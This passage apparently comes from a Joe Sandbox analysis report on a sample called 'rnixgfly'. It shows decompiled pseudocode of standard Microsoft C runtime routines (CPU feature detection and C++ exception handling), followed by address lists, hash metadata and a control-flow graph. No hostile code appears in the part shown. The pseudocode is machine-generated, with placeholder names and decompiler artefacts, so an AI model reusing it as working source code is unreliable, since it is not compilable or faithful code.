                      				 *0x415030 =  *0x415030 | 0x00000001;
                      				if(IsProcessorFeaturePresent(0xa) == 0) {
                      					L23:
                      					return 0;
                      				}
                      				_v20 = _v20 & 0x00000000;
                      				_push(_t74);
                      				_t93 =  &_v40;
                      				asm("cpuid");
                      				_t75 = _t74;
                      				 *_t93 = 0;
                      				 *((intOrPtr*)(_t93 + 4)) = _t74;
                      				 *((intOrPtr*)(_t93 + 8)) = 0;
                      				 *(_t93 + 0xc) = _t90;
                      				_v16 = _v40;
                      				_v8 = _v28 ^ 0x49656e69;
                      				_v12 = _v32 ^ 0x6c65746e;
                      				_push(_t75);
                      				asm("cpuid");
                      				_t77 =  &_v40;
                      				 *_t77 = 1;
                      				 *((intOrPtr*)(_t77 + 4)) = _t75;
                      				 *((intOrPtr*)(_t77 + 8)) = 0;
                      				 *(_t77 + 0xc) = _t90;
                      				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                      					L9:
                      					_t96 =  *0x415c68; // 0x2
                      					L10:
                      					_t85 = _v32;
                      					_t60 = 7;
                      					_v8 = _t85;
                      					if(_v16 < _t60) {
                      						_t78 = _v20;
                      					} else {
                      						_push(_t77);
                      						asm("cpuid");
                      						_t82 =  &_v40;
                      						 *_t82 = _t60;
                      						 *((intOrPtr*)(_t82 + 4)) = _t77;
                      						 *((intOrPtr*)(_t82 + 8)) = 0;
                      						_t85 = _v8;
                      						 *(_t82 + 0xc) = _t90;
                      						_t78 = _v36;
                      						if((_t78 & 0x00000200) != 0) {
                      							 *0x415c68 = _t96 | 0x00000002;
                      						}
                      					}
                      					_t61 =  *0x415030; // 0x6f
                      					_t62 = _t61 | 0x00000002;
                      					 *0x415c64 = 1;
                      					 *0x415030 = _t62;
                      					if((_t85 & 0x00100000) != 0) {
                      						_t63 = _t62 | 0x00000004;
                      						 *0x415c64 = 2;
                      						 *0x415030 = _t63;
                      						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                      							asm("xgetbv");
                      							_v24 = _t63;
                      							_v20 = _t90;
                      							_t104 = 6;
                      							if((_v24 & _t104) == _t104) {
                      								_t66 =  *0x415030; // 0x6f
                      								_t67 = _t66 | 0x00000008;
                      								 *0x415c64 = 3;
                      								 *0x415030 = _t67;
                      								if((_t78 & 0x00000020) != 0) {
                      									 *0x415c64 = 5;
                      									 *0x415030 = _t67 | 0x00000020;
                      									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                      										 *0x415030 =  *0x415030 | 0x00000040;
                      										 *0x415c64 = _t104;
                      									}
                      								}
                      							}
                      						}
                      					}
                      					goto L23;
                      				}
                      				_t73 = _v40 & 0x0fff3ff0;
                      				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                      					_t99 =  *0x415c68; // 0x2
                      					_t96 = _t99 | 0x00000001;
                      					 *0x415c68 = _t96;
                      					goto L10;
                      				} else {
                      					goto L9;
                      				}
                      			}






























                      0x0040207b
                      0x0040207e
                      0x00402088
                      0x00402099
                      0x0040224b
                      0x0040224e
                      0x0040224e
                      0x0040209f
                      0x004020a5
                      0x004020aa
                      0x004020ae
                      0x004020b2
                      0x004020b4
                      0x004020b6
                      0x004020b9
                      0x004020be
                      0x004020c7
                      0x004020d8
                      0x004020e3
                      0x004020e9
                      0x004020ea
                      0x004020f0
                      0x004020f3
                      0x004020fd
                      0x00402100
                      0x00402103
                      0x00402106
                      0x0040214b
                      0x0040214b
                      0x00402151
                      0x00402151
                      0x00402156
                      0x00402157
                      0x0040215d
                      0x0040218f
                      0x0040215f
                      0x00402161
                      0x00402162
                      0x00402168
                      0x0040216b
                      0x0040216d
                      0x00402170
                      0x00402173
                      0x00402176
                      0x00402179
                      0x00402182
                      0x00402187
                      0x00402187
                      0x00402182
                      0x00402192
                      0x00402197
                      0x0040219a
                      0x004021a4
                      0x004021af
                      0x004021b5
                      0x004021b8
                      0x004021c2
                      0x004021cd
                      0x004021d9
                      0x004021dc
                      0x004021df
                      0x004021ea
                      0x004021ef
                      0x004021f1
                      0x004021f6
                      0x004021f9
                      0x00402203
                      0x0040220b
                      0x00402210
                      0x0040221a
                      0x00402228
                      0x0040223b
                      0x00402242
                      0x00402242
                      0x00402228
                      0x0040220b
                      0x004021ef
                      0x004021cd
                      0x00000000
                      0x0040224a
                      0x0040210b
                      0x00402115
                      0x0040213a
                      0x00402140
                      0x00402143
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00402091
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                      • Instruction ID: f4e6d6712146c31b67f0ac610b88ab6e8419e367a2555085ce8b4d0adaa77c0e
                      • Opcode Fuzzy Hash: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                      • Instruction Fuzzy Hash: F6515AB1911A15CBDB14CF94DAD97EABBF1FB88314F14857AC445EB3A0D3B89900CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 230 4038eb-403916 call 4044a9 233 403c8a-403c8f call 40579a 230->233 234 40391c-40391f 230->234 234->233 236 403925-40392e 234->236 238 403934-403938 236->238 239 403a2b-403a31 236->239 238->239 240 40393e-403945 238->240 241 403a39-403a47 239->241 242 403947-40394e 240->242 243 40395d-403962 240->243 244 403bf3-403bf6 241->244 245 403a4d-403a51 241->245 242->243 246 403950-403957 242->246 243->239 247 403968-403970 call 4029b3 243->247 248 403bf8-403bfb 244->248 249 403c19-403c22 call 4029b3 244->249 245->244 250 403a57-403a5e 245->250 246->239 246->243 264 403c24-403c28 247->264 265 403976-40398f call 4029b3 * 2 247->265 248->233 252 403c01-403c16 call 403c90 248->252 249->233 249->264 253 403a60-403a67 250->253 254 403a76-403a7c 250->254 252->249 253->254 258 403a69-403a70 253->258 259 403a82-403aa9 call 402d64 254->259 260 403b93-403b97 254->260 258->244 258->254 259->260 276 403aaf-403ab2 259->276 262 403ba3-403baf 260->262 263 403b99-403ba2 call 40263c 260->263 262->249 269 403bb1-403bbb 262->269 263->262 265->233 291 403995-40399b 265->291 273 403bc9-403bcb 269->273 274 403bbd-403bbf 269->274 278 403be2-403bef call 40436a 273->278 279 403bcd-403be0 call 4029b3 * 2 273->279 274->249 277 403bc1-403bc5 274->277 281 403ab5-403aca 276->281 277->249 283 403bc7 277->283 294 403bf1 278->294 295 403c4e-403c63 call 4029b3 * 2 278->295 308 403c29 call 4056de 279->308 286 403ad0-403ad3 281->286 287 403b74-403b87 281->287 283->279 286->287 288 403ad9-403ae1 286->288 287->281 292 403b8d-403b90 287->292 288->287 293 403ae7-403afb 288->293 297 4039c7-4039cf call 4029b3 291->297 298 40399d-4039a1 291->298 292->260 299 403afe-403b0f 293->299 294->249 326 403c65 295->326 327 403c68-403c85 call 402f57 call 40426a call 404427 call 4041e1 295->327 313 4039d1-4039f1 call 4029b3 * 2 call 40436a 297->313 314 403a33-403a36 297->314 298->297 303 4039a3-4039aa 298->303 304 403b11-403b22 call 403dc6 299->304 305 403b35-403b42 299->305 309 4039ac-4039b3 303->309 310 4039be-4039c1 303->310 323 403b24-403b2d 304->323 324 403b46-403b6e call 40386b 304->324 305->299 316 403b44 305->316 322 403c2e-403c49 call 40263c call 403f71 call 40225b 308->322 309->310 311 4039b5-4039bc 309->311 310->233 310->297 311->297 311->310 313->314 344 4039f3-4039f8 313->344 314->241 321 403b71 316->321 321->287 322->295 323->304 330 403b2f-403b32 323->330 324->321 326->327 327->233 330->305 344->308 347 4039fe-403a11 call 403fc6 344->347 347->322 351 403a17-403a23 347->351 351->308 352 403a29 351->352 352->347
                      C-Code - Quality: 71%
                      			E004038EB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                      				signed char* _v0;
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				intOrPtr _v48;
                      				signed int _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				void _v64;
                      				signed int _v68;
                      				char _v84;
                      				intOrPtr _v88;
                      				signed int _v92;
                      				intOrPtr _v100;
                      				void _v104;
                      				intOrPtr* _v112;
                      				signed char* _v184;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t201;
                      				signed int _t202;
                      				char _t203;
                      				signed int _t205;
                      				signed int _t207;
                      				signed char* _t208;
                      				signed int _t209;
                      				signed int _t210;
                      				signed int _t214;
                      				void* _t217;
                      				signed char* _t220;
                      				void* _t222;
                      				void* _t224;
                      				signed char _t228;
                      				signed int _t229;
                      				void* _t231;
                      				void* _t234;
                      				void* _t237;
                      				signed int _t247;
                      				void* _t250;
                      				intOrPtr* _t251;
                      				signed int _t252;
                      				intOrPtr _t253;
                      				signed int _t254;
                      				void* _t259;
                      				void* _t264;
                      				void* _t265;
                      				signed int _t269;
                      				signed char* _t270;
                      				intOrPtr* _t271;
                      				signed char _t272;
                      				signed int _t273;
                      				signed int _t274;
                      				intOrPtr* _t276;
                      				signed int _t277;
                      				signed int _t278;
                      				signed int _t283;
                      				signed int _t290;
                      				signed int _t291;
                      				signed int _t294;
                      				signed int _t296;
                      				signed char* _t297;
                      				signed int _t298;
                      				signed char _t299;
                      				signed int* _t301;
                      				signed char* _t304;
                      				signed int _t314;
                      				signed int _t315;
                      				signed int _t317;
                      				signed int _t327;
                      				void* _t329;
                      				void* _t331;
                      				void* _t332;
                      				void* _t333;
                      				void* _t334;
                      
                      				_t296 = __edx;
                      				_push(_t315);
                      				_t301 = _a20;
                      				_v20 = 0;
                      				_v28 = 0;
                      				_t275 = E004044A9(_a8, _a16, _t301);
                      				_t332 = _t331 + 0xc;
                      				_v12 = _t275;
                      				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                      					L67:
                      					_t201 = E0040579A(_t270, _t275, _t296, _t315);
                      					asm("int3");
                      					_t329 = _t332;
                      					_t333 = _t332 - 0x38;
                      					_push(_t270);
                      					_t271 = _v112;
                      					__eflags =  *_t271 - 0x80000003;
                      					if( *_t271 == 0x80000003) {
                      						return _t201;
                      					} else {
                      						_push(_t315);
                      						_push(_t301);
                      						_t202 = E004029B3(_t271, _t275, _t296, _t315);
                      						__eflags =  *(_t202 + 8);
                      						if( *(_t202 + 8) != 0) {
                      							__imp__EncodePointer(0);
                      							_t315 = _t202;
                      							_t222 = E004029B3(_t271, _t275, _t296, _t315);
                      							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                      							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                      								__eflags =  *_t271 - 0xe0434f4d;
                      								if( *_t271 != 0xe0434f4d) {
                      									__eflags =  *_t271 - 0xe0434352;
                      									if( *_t271 != 0xe0434352) {
                      										_t214 = E00402E31(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                      										_t333 = _t333 + 0x1c;
                      										__eflags = _t214;
                      										if(_t214 != 0) {
                      											L84:
                      											return _t214;
                      										}
                      									}
                      								}
                      							}
                      						}
                      						_t203 = _a16;
                      						_v28 = _t203;
                      						_v24 = 0;
                      						__eflags =  *(_t203 + 0xc);
                      						if( *(_t203 + 0xc) > 0) {
                      							_push(_a24);
                      							E00402D64(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                      							_t298 = _v40;
                      							_t334 = _t333 + 0x18;
                      							_t214 = _v44;
                      							_v20 = _t214;
                      							_v12 = _t298;
                      							__eflags = _t298 - _v32;
                      							if(_t298 >= _v32) {
                      								goto L84;
                      							}
                      							_t277 = _t298 * 0x14;
                      							__eflags = _t277;
                      							_v16 = _t277;
                      							do {
                      								_t278 = 5;
                      								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                      								_t334 = _t334 + 0xc;
                      								__eflags = _v64 - _t217;
                      								if(_v64 > _t217) {
                      									goto L83;
                      								}
                      								__eflags = _t217 - _v60;
                      								if(_t217 > _v60) {
                      									goto L83;
                      								}
                      								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                      								_t283 = _t220[4];
                      								__eflags = _t283;
                      								if(_t283 == 0) {
                      									L81:
                      									__eflags =  *_t220 & 0x00000040;
                      									if(( *_t220 & 0x00000040) == 0) {
                      										_push(0);
                      										_push(1);
                      										E0040386B(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                      										_t298 = _v12;
                      										_t334 = _t334 + 0x30;
                      									}
                      									goto L83;
                      								}
                      								__eflags =  *((char*)(_t283 + 8));
                      								if( *((char*)(_t283 + 8)) != 0) {
                      									goto L83;
                      								}
                      								goto L81;
                      								L83:
                      								_t298 = _t298 + 1;
                      								_t214 = _v20;
                      								_t277 = _v16 + 0x14;
                      								_v12 = _t298;
                      								_v16 = _t277;
                      								__eflags = _t298 - _v32;
                      							} while (_t298 < _v32);
                      							goto L84;
                      						}
                      						E0040579A(_t271, _t275, _t296, _t315);
                      						asm("int3");
                      						_push(_t329);
                      						_t297 = _v184;
                      						_push(_t271);
                      						_push(_t315);
                      						_push(0);
                      						_t205 = _t297[4];
                      						__eflags = _t205;
                      						if(_t205 == 0) {
                      							L109:
                      							_t207 = 1;
                      							__eflags = 1;
                      						} else {
                      							_t276 = _t205 + 8;
                      							__eflags =  *_t276;
                      							if( *_t276 == 0) {
                      								goto L109;
                      							} else {
                      								__eflags =  *_t297 & 0x00000080;
                      								_t304 = _v0;
                      								if(( *_t297 & 0x00000080) == 0) {
                      									L91:
                      									_t272 = _t304[4];
                      									_t317 = 0;
                      									__eflags = _t205 - _t272;
                      									if(_t205 == _t272) {
                      										L101:
                      										__eflags =  *_t304 & 0x00000002;
                      										if(( *_t304 & 0x00000002) == 0) {
                      											L103:
                      											_t208 = _a4;
                      											__eflags =  *_t208 & 0x00000001;
                      											if(( *_t208 & 0x00000001) == 0) {
                      												L105:
                      												__eflags =  *_t208 & 0x00000002;
                      												if(( *_t208 & 0x00000002) == 0) {
                      													L107:
                      													_t317 = 1;
                      													__eflags = 1;
                      												} else {
                      													__eflags =  *_t297 & 0x00000002;
                      													if(( *_t297 & 0x00000002) != 0) {
                      														goto L107;
                      													}
                      												}
                      											} else {
                      												__eflags =  *_t297 & 0x00000001;
                      												if(( *_t297 & 0x00000001) != 0) {
                      													goto L105;
                      												}
                      											}
                      										} else {
                      											__eflags =  *_t297 & 0x00000008;
                      											if(( *_t297 & 0x00000008) != 0) {
                      												goto L103;
                      											}
                      										}
                      										_t207 = _t317;
                      									} else {
                      										_t184 = _t272 + 8; // 0x6e
                      										_t209 = _t184;
                      										while(1) {
                      											_t273 =  *_t276;
                      											__eflags = _t273 -  *_t209;
                      											if(_t273 !=  *_t209) {
                      												break;
                      											}
                      											__eflags = _t273;
                      											if(_t273 == 0) {
                      												L97:
                      												_t210 = _t317;
                      											} else {
                      												_t274 =  *((intOrPtr*)(_t276 + 1));
                      												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                      												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                      													break;
                      												} else {
                      													_t276 = _t276 + 2;
                      													_t209 = _t209 + 2;
                      													__eflags = _t274;
                      													if(_t274 != 0) {
                      														continue;
                      													} else {
                      														goto L97;
                      													}
                      												}
                      											}
                      											L99:
                      											__eflags = _t210;
                      											if(_t210 == 0) {
                      												goto L101;
                      											} else {
                      												_t207 = 0;
                      											}
                      											goto L110;
                      										}
                      										asm("sbb eax, eax");
                      										_t210 = _t209 | 0x00000001;
                      										__eflags = _t210;
                      										goto L99;
                      									}
                      								} else {
                      									__eflags =  *_t304 & 0x00000010;
                      									if(( *_t304 & 0x00000010) != 0) {
                      										goto L109;
                      									} else {
                      										goto L91;
                      									}
                      								}
                      							}
                      						}
                      						L110:
                      						return _t207;
                      					}
                      				} else {
                      					_t270 = _a4;
                      					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                      						L22:
                      						_t296 = _a12;
                      						_v8 = _t296;
                      						goto L24;
                      					} else {
                      						_t315 = 0;
                      						if(_t270[0x1c] != 0) {
                      							goto L22;
                      						} else {
                      							_t224 = E004029B3(_t270, _t275, _t296, 0);
                      							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                      								L61:
                      								return _t224;
                      							} else {
                      								_t270 =  *(E004029B3(_t270, _t275, _t296, 0) + 0x10);
                      								_t259 = E004029B3(_t270, _t275, _t296, 0);
                      								_v28 = 1;
                      								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                      								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                      									goto L67;
                      								} else {
                      									if( *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
                      										L23:
                      										_t296 = _v8;
                      										_t275 = _v12;
                      										L24:
                      										_v52 = _t301;
                      										_v48 = 0;
                      										__eflags =  *_t270 - 0xe06d7363;
                      										if( *_t270 != 0xe06d7363) {
                      											L57:
                      											__eflags = _t301[3];
                      											if(_t301[3] <= 0) {
                      												goto L60;
                      											} else {
                      												__eflags = _a24;
                      												if(_a24 != 0) {
                      													goto L67;
                      												} else {
                      													_push(_a32);
                      													_push(_a28);
                      													_push(_t275);
                      													_push(_t301);
                      													_push(_a16);
                      													_push(_t296);
                      													_push(_a8);
                      													_push(_t270);
                      													L68();
                      													_t332 = _t332 + 0x20;
                      													goto L60;
                      												}
                      											}
                      										} else {
                      											__eflags = _t270[0x10] - 3;
                      											if(_t270[0x10] != 3) {
                      												goto L57;
                      											} else {
                      												__eflags = _t270[0x14] - 0x19930520;
                      												if(_t270[0x14] == 0x19930520) {
                      													L29:
                      													_t315 = _a32;
                      													__eflags = _t301[3];
                      													if(_t301[3] > 0) {
                      														_push(_a28);
                      														E00402D64(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                      														_t296 = _v64;
                      														_t332 = _t332 + 0x18;
                      														_t247 = _v68;
                      														_v44 = _t247;
                      														_v16 = _t296;
                      														__eflags = _t296 - _v56;
                      														if(_t296 < _v56) {
                      															_t290 = _t296 * 0x14;
                      															__eflags = _t290;
                      															_v32 = _t290;
                      															do {
                      																_t291 = 5;
                      																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                      																_t332 = _t332 + 0xc;
                      																__eflags = _v104 - _t250;
                      																if(_v104 <= _t250) {
                      																	__eflags = _t250 - _v100;
                      																	if(_t250 <= _v100) {
                      																		_t294 = 0;
                      																		_v20 = 0;
                      																		__eflags = _v92;
                      																		if(_v92 != 0) {
                      																			_t299 = _t270[0x1c];
                      																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                      																			_t252 = _t251 + 4;
                      																			__eflags = _t252;
                      																			_v36 = _t252;
                      																			_t253 = _v88;
                      																			_v40 =  *_t251;
                      																			_v24 = _t253;
                      																			do {
                      																				asm("movsd");
                      																				asm("movsd");
                      																				asm("movsd");
                      																				asm("movsd");
                      																				_t327 = _v40;
                      																				_t314 = _v36;
                      																				__eflags = _t327;
                      																				if(_t327 <= 0) {
                      																					goto L40;
                      																				} else {
                      																					while(1) {
                      																						_push(_t299);
                      																						_push( *_t314);
                      																						_t254 =  &_v84;
                      																						_push(_t254);
                      																						L87();
                      																						_t332 = _t332 + 0xc;
                      																						__eflags = _t254;
                      																						if(_t254 != 0) {
                      																							break;
                      																						}
                      																						_t299 = _t270[0x1c];
                      																						_t327 = _t327 - 1;
                      																						_t314 = _t314 + 4;
                      																						__eflags = _t327;
                      																						if(_t327 > 0) {
                      																							continue;
                      																						} else {
                      																							_t294 = _v20;
                      																							_t253 = _v24;
                      																							goto L40;
                      																						}
                      																						goto L43;
                      																					}
                      																					_push(_a24);
                      																					_push(_v28);
                      																					E0040386B(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                      																					_t332 = _t332 + 0x30;
                      																				}
                      																				L43:
                      																				_t296 = _v16;
                      																				goto L44;
                      																				L40:
                      																				_t294 = _t294 + 1;
                      																				_t253 = _t253 + 0x10;
                      																				_v20 = _t294;
                      																				_v24 = _t253;
                      																				__eflags = _t294 - _v92;
                      																			} while (_t294 != _v92);
                      																			goto L43;
                      																		}
                      																	}
                      																}
                      																L44:
                      																_t296 = _t296 + 1;
                      																_t247 = _v44;
                      																_t290 = _v32 + 0x14;
                      																_v16 = _t296;
                      																_v32 = _t290;
                      																__eflags = _t296 - _v56;
                      															} while (_t296 < _v56);
                      															_t301 = _a20;
                      															_t315 = _a32;
                      														}
                      													}
                      													__eflags = _a24;
                      													if(__eflags != 0) {
                      														_push(1);
                      														E0040263C(_t270, _t301, _t315, __eflags);
                      														_t275 = _t270;
                      													}
                      													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                      													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                      														L60:
                      														_t224 = E004029B3(_t270, _t275, _t296, _t315);
                      														__eflags =  *(_t224 + 0x1c);
                      														if( *(_t224 + 0x1c) != 0) {
                      															goto L67;
                      														} else {
                      															goto L61;
                      														}
                      													} else {
                      														_t228 = _t301[8] >> 2;
                      														__eflags = _t301[7];
                      														if(_t301[7] != 0) {
                      															__eflags = _t228 & 0x00000001;
                      															if((_t228 & 0x00000001) == 0) {
                      																_push(_t301[7]);
                      																_t229 = E0040436A(_t270, _t301, _t315, _t270);
                      																_pop(_t275);
                      																__eflags = _t229;
                      																if(_t229 == 0) {
                      																	goto L64;
                      																} else {
                      																	goto L60;
                      																}
                      															} else {
                      																goto L54;
                      															}
                      														} else {
                      															__eflags = _t228 & 0x00000001;
                      															if((_t228 & 0x00000001) == 0) {
                      																goto L60;
                      															} else {
                      																__eflags = _a28;
                      																if(_a28 != 0) {
                      																	goto L60;
                      																} else {
                      																	L54:
                      																	 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                      																	_t237 = E004029B3(_t270, _t275, _t296, _t315);
                      																	_t286 = _v8;
                      																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                      																	goto L62;
                      																}
                      															}
                      														}
                      													}
                      												} else {
                      													__eflags = _t270[0x14] - 0x19930521;
                      													if(_t270[0x14] == 0x19930521) {
                      														goto L29;
                      													} else {
                      														__eflags = _t270[0x14] - 0x19930522;
                      														if(_t270[0x14] != 0x19930522) {
                      															goto L57;
                      														} else {
                      															goto L29;
                      														}
                      													}
                      												}
                      											}
                      										}
                      									} else {
                      										_v16 =  *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c));
                      										_t264 = E004029B3(_t270, _t275, _t296, _t315);
                      										_push(_v16);
                      										 *(_t264 + 0x1c) = _t315;
                      										_t265 = E0040436A(_t270, _t301, _t315, _t270);
                      										_pop(_t286);
                      										if(_t265 != 0) {
                      											goto L23;
                      										} else {
                      											_t301 = _v16;
                      											_t353 =  *_t301 - _t315;
                      											if( *_t301 <= _t315) {
                      												L62:
                      												E004056DE(_t270, _t286, _t296, _t301, _t315, __eflags);
                      											} else {
                      												while(1) {
                      													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                      													if(E00403FC6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4158ac) != 0) {
                      														goto L63;
                      													}
                      													_t315 = _t315 + 0x10;
                      													_t269 = _v20 + 1;
                      													_v20 = _t269;
                      													_t353 = _t269 -  *_t301;
                      													if(_t269 >=  *_t301) {
                      														goto L62;
                      													} else {
                      														continue;
                      													}
                      													goto L63;
                      												}
                      											}
                      											L63:
                      											_push(1);
                      											_push(_t270);
                      											E0040263C(_t270, _t301, _t315, __eflags);
                      											_t275 =  &_v64;
                      											E00403F71( &_v64);
                      											E0040225B( &_v64, 0x413554);
                      											L64:
                      											 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                      											_t231 = E004029B3(_t270, _t275, _t296, _t315);
                      											_t275 = _v8;
                      											 *(_t231 + 0x14) = _v8;
                      											__eflags = _t315;
                      											if(_t315 == 0) {
                      												_t315 = _a8;
                      											}
                      											E00402F57(_t275, _t315, _t270);
                      											E0040426A(_a8, _a16, _t301);
                      											_t234 = E00404427(_t301);
                      											_t332 = _t332 + 0x10;
                      											_push(_t234);
                      											E004041E1(_t270, _t275, _t296, _t301, _t315, __eflags);
                      											goto L67;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      			}






















































































                      0x004038eb
                      0x004038f2
                      0x004038f4
                      0x004038fd
                      0x00403903
                      0x0040390b
                      0x0040390d
                      0x00403910
                      0x00403916
                      0x00403c8a
                      0x00403c8a
                      0x00403c8f
                      0x00403c91
                      0x00403c93
                      0x00403c96
                      0x00403c97
                      0x00403c9a
                      0x00403ca0
                      0x00403dbf
                      0x00403ca6
                      0x00403ca6
                      0x00403ca7
                      0x00403ca8
                      0x00403caf
                      0x00403cb2
                      0x00403cb5
                      0x00403cbb
                      0x00403cbd
                      0x00403cc2
                      0x00403cc5
                      0x00403cc7
                      0x00403ccd
                      0x00403ccf
                      0x00403cd5
                      0x00403cea
                      0x00403cef
                      0x00403cf2
                      0x00403cf4
                      0x00403dbb
                      0x00000000
                      0x00403dbc
                      0x00403cf4
                      0x00403cd5
                      0x00403ccd
                      0x00403cc5
                      0x00403cfa
                      0x00403cfd
                      0x00403d00
                      0x00403d03
                      0x00403d06
                      0x00403d0c
                      0x00403d1e
                      0x00403d23
                      0x00403d26
                      0x00403d29
                      0x00403d2c
                      0x00403d2f
                      0x00403d32
                      0x00403d35
                      0x00000000
                      0x00000000
                      0x00403d3b
                      0x00403d3b
                      0x00403d3e
                      0x00403d41
                      0x00403d50
                      0x00403d51
                      0x00403d51
                      0x00403d53
                      0x00403d56
                      0x00000000
                      0x00000000
                      0x00403d58
                      0x00403d5b
                      0x00000000
                      0x00000000
                      0x00403d69
                      0x00403d6b
                      0x00403d6e
                      0x00403d70
                      0x00403d78
                      0x00403d78
                      0x00403d7b
                      0x00403d7d
                      0x00403d7f
                      0x00403d9b
                      0x00403da0
                      0x00403da3
                      0x00403da3
                      0x00000000
                      0x00403d7b
                      0x00403d72
                      0x00403d76
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403da6
                      0x00403da9
                      0x00403daa
                      0x00403dad
                      0x00403db0
                      0x00403db3
                      0x00403db6
                      0x00403db6
                      0x00000000
                      0x00403d41
                      0x00403dc0
                      0x00403dc5
                      0x00403dc6
                      0x00403dc9
                      0x00403dcc
                      0x00403dcd
                      0x00403dce
                      0x00403dcf
                      0x00403dd2
                      0x00403dd4
                      0x00403e4c
                      0x00403e4e
                      0x00403e4e
                      0x00403dd6
                      0x00403dd6
                      0x00403dd9
                      0x00403ddc
                      0x00000000
                      0x00403dde
                      0x00403dde
                      0x00403de1
                      0x00403de4
                      0x00403deb
                      0x00403deb
                      0x00403dee
                      0x00403df0
                      0x00403df2
                      0x00403e24
                      0x00403e24
                      0x00403e27
                      0x00403e2e
                      0x00403e2e
                      0x00403e31
                      0x00403e34
                      0x00403e3b
                      0x00403e3b
                      0x00403e3e
                      0x00403e45
                      0x00403e47
                      0x00403e47
                      0x00403e40
                      0x00403e40
                      0x00403e43
                      0x00000000
                      0x00000000
                      0x00403e43
                      0x00403e36
                      0x00403e36
                      0x00403e39
                      0x00000000
                      0x00000000
                      0x00403e39
                      0x00403e29
                      0x00403e29
                      0x00403e2c
                      0x00000000
                      0x00000000
                      0x00403e2c
                      0x00403e48
                      0x00403df4
                      0x00403df4
                      0x00403df4
                      0x00403df7
                      0x00403df7
                      0x00403df9
                      0x00403dfb
                      0x00000000
                      0x00000000
                      0x00403dfd
                      0x00403dff
                      0x00403e13
                      0x00403e13
                      0x00403e01
                      0x00403e01
                      0x00403e04
                      0x00403e07
                      0x00000000
                      0x00403e09
                      0x00403e09
                      0x00403e0c
                      0x00403e0f
                      0x00403e11
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e11
                      0x00403e07
                      0x00403e1c
                      0x00403e1c
                      0x00403e1e
                      0x00000000
                      0x00403e20
                      0x00403e20
                      0x00403e20
                      0x00000000
                      0x00403e1e
                      0x00403e17
                      0x00403e19
                      0x00403e19
                      0x00000000
                      0x00403e19
                      0x00403de6
                      0x00403de6
                      0x00403de9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403de9
                      0x00403de4
                      0x00403ddc
                      0x00403e4f
                      0x00403e53
                      0x00403e53
                      0x00403925
                      0x00403925
                      0x0040392e
                      0x00403a2b
                      0x00403a2b
                      0x00403a2e
                      0x00000000
                      0x0040395d
                      0x0040395d
                      0x00403962
                      0x00000000
                      0x00403968
                      0x00403968
                      0x00403970
                      0x00403c24
                      0x00403c28
                      0x00403976
